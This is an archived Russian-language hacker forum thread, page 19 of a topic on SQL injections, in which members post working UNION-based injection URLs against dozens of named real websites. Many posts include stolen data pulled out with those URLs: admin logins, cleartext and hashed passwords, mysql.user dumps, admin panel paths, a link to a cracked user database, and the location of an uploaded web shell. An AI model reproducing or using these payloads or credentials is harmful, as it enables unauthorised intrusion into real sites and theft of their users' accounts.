SQL Инъекции [Архив] - Страница 19

fRg

15.01.2008, 11:57

elmu.aspu.ru - Астраханский государственный университет, Учебно-научная лаборатория "Познание человека"http://elmu.aspu.ru/?news=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4/* 4.1.22-log:elmu:webmaster@localhost

eteplo.ru - Торгово-строительная компания "КМ-СЕРВИС"http://eteplo.ru/index.php?act=system&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/* 4.1.22:eteplo:eteplo@localhost

Подобрал табы: news,cable,tech

wfga.net - The Washington Fish Growers Associationhttp://www.wfga.net/print.php?a=news&printid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12/* 5.0.45-community:wfgaswe1_wfga:wfgaswe1_webacce@localhost

Табы:DBSecurity,Events,Issues,Mailing_Cache,Me mbers_Only,News_Articles,News_Galleries,Polls,Rela ted_Articles,Site_Links,Tags,Templates,Tough_Domai ns,Updates_Subscribers
В табе DBSecurity поля:ID,username,password
Админка здесь:http://www.wfga.net/admin/
Админ [логин:пасс] :wfga:viking2

-----------------------------------------------------------------

Grey:

------------Выкладывать шеллы в паблик нельзя------------

159932

15.01.2008, 12:57

zdorovie-tv.ru
http://www.zdorovie-tv.ru/cgi-bin/forum_1.pl?action=viewbody&id=0+and+1=0+union+select+concat(user,char(58),pas sword),2,4,5,6,7,8,9,0,0,0+from+mysql.user+limit+1 ,1/*
4.0.23-standard
root:2d8373280041e026:ctvm

_-Ramos-_

15.01.2008, 13:00

http://www.exmormon.org/boards/w-agora/index.php?site=exmobb&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 %20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*

debugadmin:d52dee500ff126055ad85eb2ef2a37e4

.Begemot.

15.01.2008, 14:51

sportpiac.hu
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(USER(),0x3a,VER SION(),0x3a,DATABASE()),2,3,4,5,6,7,8/*
filemon@localhost:5.0.44-log:sportpiac
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,table_name,2,3,4,5,6,7 ,8+from+information_schema.tables/* - таблици
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(column_name),2, 3,4,5,6,7,8+from+information_schema.columns+limit+ 1,100/* - столбци
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user,0x 3a,pass),2,3,4,5,6,7,8+from+users/*
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user_lo gin,0x3a,user_pass),2,3,4,5,6,7,8+from+wp_users/*
http://www.sportpiac.hu/admin/
1:admin:21232f297a57a5a743894a0e4a801fc3:admin
3:filemon:1a1dc91c907325c69271ddf0c944bc72:pass

Tigger

15.01.2008, 15:41

http://www.singletrackworld.co.uk/article.php?sid=-16+union+select+1,2,concat_ws(char(58),name,pass,e mail),4,5,6,7,8,9+from+users/*
Проверил по антибояну...там был этот сайт, но только .com....так что не в счет))
-----------------------------------------------------------------------
http://www.digitaltouch.co.uk/article.php?ID=-2+union+select+1,2,3,concat_ws(0x2f,version(),user (),database()),5/*
4.0.27-standard/digitalt_jeffbrf@localhost/digitalt_digitaltouch
-----------------------------------------------------------------------
http://www.atlvalsesiavercelli.it/article.php?id=-1+union+select+CONVERT(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*
4.1.11-Debian_4sarge8-log:atl@localhost:atl_valsesia

Toxic

15.01.2008, 19:41

http://www.petsby.com/dogs_list.php?page=1&group_id=-1/**/union/**/select/**/concat_ws(char(124),username,user_password)/**/from/**/forum_users/**/limit/**/1,1/*

Admin|e1df5c96bad252401b022d71f1c83d5e
Вот только не расшифровываеться ((

SWAT

16.01.2008, 00:04

http://www.snami.pisa.it/show_new.php?id=-99+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8+from+users/*

http://www.ciag.com.gt/show_new.php?id=-6+union+select+1,VERSION(),3,4,5,6,7/*

Fata1ex

16.01.2008, 00:09

Toxic, http://forum.xakep.ru/m_1024319/printable.htm

Admin:13042006

fobofob

16.01.2008, 01:16

крупный сайт

http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(user_name,0x3a,user_pass ,0x3a,user_email)+from+groove_user+limit+0,1/*

http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(admin_name,0x3a,admin_pa ss)+from+groove_admin/*

юзеров больше 24000 шт :D

_________________________________
секес )))

http://sexsecrets.ru/?r=enciklopedia&id=-176+union+select+1,concat(user_email,0x3a,username ,0x3a,user_password),3+from+phpbb_users+limit+1,1/*

:D-писюн.ру

http://www.pisun.ru/?price=a&price_max=&sel_metro=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,version(), 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79 ,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,9 6,97,98,99,100,101,102/*

5 мускул ;)

_________________________________

http://www.price-list.kiev.ua/cgi-bin/price_img_info.cgi?id=-3901576+union+select+1,cast(concat(email,0x3a,pass )+as+binary),3,4,5+from+users+limit+0,1/*

_________________________________

видео магазины

http://www.home-dvd.info/details.php?Id=16749+union+select+concat(email,0x3 a,pwd)+from+users+limit+10,10/*

http://www.foxmovies.ru/index.php3?id=-10595+union+select+1,2,3,4,5,concat(nick,0x3a,pass wd),7,8,9+from+_user+limit+0,1/*

_________________________________

туроператор

http://www.mirtour.ru/about/news/?id=-37+union+select+1,2,3,4,concat(manager,0x3a,manage rpass),6,7,8,9+from+discont_managers+limit+2,1/*

Tigger

16.01.2008, 02:17

http://www.samopoznanie.com/printarticle.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5/*
4.0.23a-log/lidia@localhost/samopoznanie

noneim

16.01.2008, 07:59

http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+group+by+1--

http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+or+1=1--

Вроде инъёкция есть, но group by, order by, union почему то не работают.. (

fRg

16.01.2008, 09:57

evrofasad.com.uahttp://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6 4.1.20-community-nt:db_evrofasad_new:evrofasad_user@localhosthttp://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,user,password),2+fro m+mysql.user+limit+0,1/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6 root:*F9412D7E95AC1E517BBDEA70B0CDA1C3A954DBA5
eurofasad:*685A8769F0EFB1A0358699E09AECB47216F2FA6 0
evrofasad_user:*E594B415CBFCBCBE92DE48810E7442D7E9 925964
sofit:*A75C7664FF4013AC928FE355BE7BEE313295EF15
loginforum:*76A5D146549860B09B9BC8C529EDF05D95A96E 90
backuper:*759E70BE56B564382083D276339AC5F660332A1C
svetofor:*F185EF1C8A14114439937712A796759943FE4C7D
viknauser:*C9EE7E827518FBB0B6452F32A3A0E74EE4348DA 6
dblussole:*8303224CA73F32E099ED4D5589372A48847A4AD C
sofit_forum:*C010E6C07BCD31C8EE45D04093BB1C50A3BE7 981
svt:*917B41A42ED3307B057D4462776BE6D22191E471
efplast:*890244829E7E1073887CD3BE4F3DD40ED1AE65CC
delux:*D5876B1B1A4A3233F51317EFA97D9CD60E571AA0
claroline:*6C14E3D8CE32929711BCBB4C2F7CA95EA7B2A22 1
integral:*6020723CC8C46038FB7E9D29E26E50357695DA69
svitkomfortu:*C0842FED9DED84F798E19B4DFAEAEC1DA180 EB38
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656
houses:*7EAE149B76900876ABD03DD1E4281B218A9D47F3
test:*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
lussoleforum:*40E10559E7BA57D182650F9AFDBFA1208440 2352
poselok_db_user:*A652F43B1179494CF8ED2EA752C864165 40A8041
joomla:*F70658E9BDD2910AC33ACDA164605DFC1DA70A68

fRg

16.01.2008, 12:33

ccn-usa.nethttp://www.ccn-usa.net/contents.php?typeid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/* 4.0.23-standard:ccnusa:ccnusa@localhost

hamsy.net - походу финский спорт-сайтhttp://www.hamsy.net/uutinen.php?id=-1+union+select+null,concat_ws(0x3a,version(),datab ase(),user()),null,null,null,null/**/ PostgreSQL
5.0.51-Dotdeb_0.dotdeb.1-log:db17112:17112@62.73.58.153

http://www.hamsy.net/uutinen.php?id=-1+union+select+null,TABLE_NAME,null,null,null,null +from+INFORMATION_SCHEMA.TABLES+limit+1+offset+25-- Табы (кроме стандартных):calendar,chat,links,news,r esults,team,teamuser,valikko,visitor

fRg

16.01.2008, 13:31

order.elite-games.ruhttp://www.order.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20/* 4.1.21-community-nt : order : order@localhost

Таба oeg_users :http://www.order.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,passwd ,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+f rom+oeg_users+limit+273,1/* Админ [логин : МД5(пасс)] :
admin : baf2c85699402cad6c8d9ff73892376f

Saint-Sky

16.01.2008, 14:34

http://www.qp7.ru ip:81.176.66.38
У них по-соседству(а может - на их системе) сидит MTS.ru!!! ip:81.176.70.200

http://www.qp7.ru/live/newscomp.aspx?nid=5133+or+1=(select+db_name())--

.Begemot.

16.01.2008, 14:46

doprava.vhd.cz
http://doprava.vhd.cz/list.php?cc=-1+union+select+0,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE())/*
doprava.vhd.cz@193.86.238.11:4.1.22-log:doprava_vhd_cz

meteonews.fr
http://www.meteonews.fr/index.php?page=wetter_pwl&lang=en&wetter_pwl=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8/*
mysql@webserver.intern:5.0.44-enterpris

db.seoulprinting.com
http://db.seoulprinting.com/sub/sub_01.php?sub=1&mid=-1550+union+select+0/*

.Begemot.

16.01.2008, 16:09

proexmotorsport.liveforspeed.hu
http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,conc at(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33/*
proex_web@localhost:4.0.22-nt:proex_web
http://proexmotorsport.liveforspeed.hu/index.php?headlinesid=999999+union+select+0,1,2,co ncat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+f rom+members/*
pass: 96w9sFSaaPqGQ
foodcentrale.com
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(USER(),0x3a,VERSION( ),0x3a,DATABASE()),1/*
admin@www.foodcentrale.de:5.0.27:foodcentrale
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+table_name,1+from+informati on_schema.tables+limit+10,100/* - названия таблиц
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+column_name,1+from+informat ion_schema.columns/* - названия столбцов
http://foodcentrale.com/suche/detail/index.php?index=-860011151+union+select+concat(user),1+from+fc_bask et_user/*

Toxic

16.01.2008, 22:02

http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,version(),database(),user(),6 ,7,8,9,10,11,12/*

http://www.mainelobsterfestival.com/release.php?ID=-13+union+select+1,2,3,version(),user(),6,database( ),8,9,10,11,12/*

http://www.wishard.edu/news/release.php?id=-38+union+select+1,version(),database(),4,user(),6/*

http://www.integralwireless.net/news_media/release.php?id=-13+union+select+1,version(),database(),4,5,user(), 7,8,9/*

http://www.peyron.com/release.php?id=-26+union+select+1,2,3,concat(version(),user()),dat abase(),6,7,8/*

http://www.daltonagency.com/release.php?id=-51+union+select+1,user,password,4,5,6,7+from+mysql .user/*

http://www.playavista.com/about/news/release.php?id=-18+union+select+1,2,3,4,5,6,convert(concat_ws(0x3b ,password,user,database())using%20latin1),8+from+m ysql.user/*

http://www.camdenme.org/news/release.php?ID=-63+union+select+1,2,3,4,user(),database(),7,8,9,10 ,11,12,13,14,version()/*

BizzyD

16.01.2008, 22:45

http://echl.leaguestat.com/stats/player.php?id=99999+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,concat_ws(0x3a,user,pass word)r,36+from+mysql.user/*
newsport@node2.leaguestat.com:echl:5.0.22-log

http://brmp3.com/player.php?id=99999+union+select+1,2,3,concat_ws(0 x3a,username,password),5,6+from+users+limit+1,1/*
brmp3_mp3@localhost:brmp3_mp3:4.1.22-standard

http://www.ldmstudio.com/go/players.php?id=99999+union+select+1,2,3,4,5,6,7+fr om+admin/*
ldm@localhost:ldm_prima:5.0.45-community-log

http://www.nkzagreb.hr/news.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/*
nkzagrebhr@localhost:nkzagreb:4.1.11-Debian_4sarge7-log

http://www.mlb-players.com/players/players.php?id=99999+union+select+1,2,3,4,table_na me,6+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
mlbplaye_stats@localhost:mlbplaye_stats:5.0.45-community

http://www.metalistfans.net/players.php?id=99999+union+select+1,2,3,4,5,6,7,co ncat_ws(0x3a,user(),database(),version()),9/*
metalistfans@localhost:metalistfans:4.0.27-log

http://www.elitegolfmanagement.com/Players.php?id=99999+union+select+1,2,3,4,5,6,conc at_ws(0x3a,user(),database(),version()),8,9,10,11, 12,13,14,15/*
elitegol_webuser@boscgi0101.eigbox.net:elitegol_da tabase:5.0.45-log

WuWu

17.01.2008, 00:44

http://www.cdma.uz/index.php?action=news&news_id=608+union+select+1,login,passw,4,5,6,7,8,9 ,10,11+from+cms_admins/*

admin: cdmadmin
password: 9622f76499e8588addb05838587a8e8f (росшифровуйте кому нада =))

KPOT_f!nd

17.01.2008, 03:37

http://www.macworld.it/showPage.php?template=notizie&id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28/*
редикт . . . .

Zitt

17.01.2008, 05:27

http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+inf ormation_schema.tables+limit+1,1/*

The_HuliGun

17.01.2008, 10:04

народ a можно в подзапросах использовать update или insert
Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.

WhatUw81N4

17.01.2008, 10:13

2 159932

Посмотрел robots, по идее должна быть в /admin/, но там нету...

Попробуй таблицы от форума. (phpbb_users) - Если подберешь пасс, то можешь залить шелл...

http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+UNION+SELECT+1,concat(username,0x3a,user_pa ssword),3,4,5+from+gurujen_forum.phpbb_users/*

Ольга:82e0839b64d121ef7154f2b8d5b27351:qween1

Администрация Форума!

Ольга : qween1

chekist

17.01.2008, 11:12

Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.
update и в insert, select прокатывает

dinar_007

17.01.2008, 14:47

SQL-inj:
http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname ,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=

БД (расшифровано 4185 из 4613 (почти 91%)) паролей:

http://dinar007.by.ru/hbd/base_frugalreader.zip
Пароль к архиву: antichat.ru

sedoy_xxx

17.01.2008, 17:02

www.lrn.ru
http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),v ersion()),2/*
lrn_ru@localhost:lrn_ru:5.0.46-log/2 (file_priv нет)
http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password), 2+from+users+where+username+like+%22Vitls%22/*
установочный путь: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
админка: http://www.lrn.ru/admin (как через нее залить шелл я не догнал)
Vitls:gjhextybt

WuWu

17.01.2008, 17:39

http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),databa se()),3,4,5,6,7/*

alteregotutby@gemini.tutby.com:alteregotutby

WuWu

17.01.2008, 18:09

http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7/*
5.0.24a
climatea_climat@localhost
climatea_climat

усть доступ к schema , но я несмог найти админа

.Begemot.

17.01.2008, 19:00

channelg.tv
http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat( USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54
channelg@localhost:4.0.24:channelg
Там CMS какая-то...
uginfo.sfedu.ru
http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,n ull/**/
sgcs.fcm.unc.edu.ar
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/
user - postgres
version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SC HEMA.TABLES/**/ - названия таблиц
http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_S CHEMA.COLUMNS/**/ - названия колонок

BizzyD

17.01.2008, 22:24

http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),data base(),version()),3,4/*
netlink_netltbn@localhost:netlink_netltbn:5.0.24a

http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),da tabase(),version()),4,5,6,7/*
homelogin@localhost:homeopath:4.1.22

ElteRUS

18.01.2008, 00:22

сессия съела мой мозг :\
---

http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9/*

4.1.22-standard/chatman_chatman/chatman_u51279@localhost
-----------------------------------------------------------------------------

http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*

4.1.21/mmp/mmp@localhost

http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3, 4,5,6,7,8,9,10+from+users/*

логин/пароль
admin/mrkroz2909

--------------------------------------------------------------------------

А это аццкие специалисты сетевых технологий угрожают гнусным хакерам :D

http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*

Momiji

18.01.2008, 01:30

http://www.peekvid.com
http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws (0x3,version(),user(),database())/*

5.0.22root@kentuckyprivpeekvid_v2
http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws (0x3,user,password)+from+mysql.user/*
Root67ef27e02618b87a:ZAQxsw

ElteRUS

18.01.2008, 02:00

http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user())

5.0.51/hdds/hdds@localhost

http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username ,password,email,icq)+from+forums_auth+limit+0,1

логин/хеш/мейл/асику
Cavaler/50cc3872ca61179a359e6263a3fd3d43/pavel@kostrom.spb.ru/48555995

presidentua

18.01.2008, 02:45

газета Труд кому то надо?
ну тогда держите -
http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*
trudinfo@localhost
4.1.21-log

ReVOLVeR

18.01.2008, 20:54

MSSQL
_http://www.treasury.gov.au/content/tax_treaties.asp?ContentID=759'
_http://www.nsw.gov.au/Business_results.asp?SEARCH_KEYS='OPER_LCYCLE_BUSI NESS_SNSW&DISPLAY1=Business+Life+Cycle&DISPLAY2=Operating+a+Business
_http://www.montgomerycountymd.gov/csltmpl.asp?url='/content/council/index.asp
_http://web.nsc.gov.tw/default.asp?mp=7'
_http://www.pme.gov.sa/warnning/file.asp?ID=68'
_http://www.izkor.gov.il/izkor86.asp?t=0'&dir=0&i=0&pab=4332&nab=91086&pdt=8318&ndt=9

MySQL
_http://www.wiredforhealth.gov.uk/cat.php?catid=842'
_http://www.monitor-nhsft.gov.uk/publications.php?cat=8'
_http://www.cszx.gov.cn/art/catb.php?catid=1'
_http://www.yarriambiack.vic.gov.au/council_services/sub_menu.php?subMenuId=119&menuId=27'
_http://www.tcvn.gov.vn/en/index.php?p=cat&cid=35'

_http://porx.rambler.ru/porx/viewprofile.php?user=%D0%B4%D0%BE%D0%BB'
_http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1390'

.nor

18.01.2008, 22:06

http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20(%22henna%22,%22drops_5%22))--

таблицы - henna и drops_5 дальше подобрать не смог ибо запятые жестоко фильтруются.
Пробовал различные методы в т.ч 0x2c , сhar'ы и тд. кто найдёт замену этой запятой плз скиньте инфу сюда или в личку)

ХаЬа

18.01.2008, 22:54

http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from +jos_users/*

it's my

19.01.2008, 07:37

http://adeptweb.info/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.budshop.com.ua/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://kadrovest.ru/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://hostofmine.net/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.akademikerzeitung.ch/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.jerseyrecruitment.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.identitytextiles.com/2007/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://tryanotherangle.com/joomla/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.ilm-media.at/portal/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.worldfashioncouncil.org/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.sagentpharma.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://www.innoventions.co.za/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(32,112,97,115, 115,119,111,114,100,58),password),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +jos_users/*
http://chinstudent.org/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.zeros2heroes.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.jovita.lt/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.stopthetraffik.nl/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.circusfrog.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://portalul.eu/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,co ncat(char(117,115,101,114,110,97,109,101,58),usern ame,char(32,112,97,115,115,119,111,114,100,58),pas sword),11,12,13,14,15,16,17+from+jos_users+limit+1/*

o3,14um

19.01.2008, 15:29

sql-inj
http://www.kinder.by/consultant/qa/read.php?topicid=-1+union+select+1,2,3,concat_ws(0x3a,login,passwd,u ser,id),5+from+profiles/*
http://www.voina-i-mir.ru/dicchapter/?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6
http://www.rest.crimea.ua/internat.php?urlp=&fid=34'+union+select+1,concat_ws(0x3a,version(),da tabase(),user()),concat_ws(0x3a,email,city,address ,phone,fax,icq),4,5,6,7,8,9,10+from+orders+where+e mail<>1/*
http://www.astralpole.org/display.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,concat_ws(0x3a,user,password),7,8 ,9,10,11,12,13+from+mysql.user/* ( шелл http://www.astralpole.org/files/ms.php )
http://www.propertyshop.bg/news.php?lang=ru&valuta=&id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*
http://www.animemagazine.ru/catalog/index.php?idk=-1)+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,version(),database(),user()),12,13,14,15,16,17,1 8,19,20,21,22/*
http://www.ethology.ru/interview/?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7,8/*
http://www.avd.org.ua/viewdetails.php?id=-1+union+select+1,concat_ws(0x3a,username,passwd),3 ,4,concat_ws(0x3a,version(),database(),user()),6,7 ,8,9,10,11,12,13,14,15+from+user/*
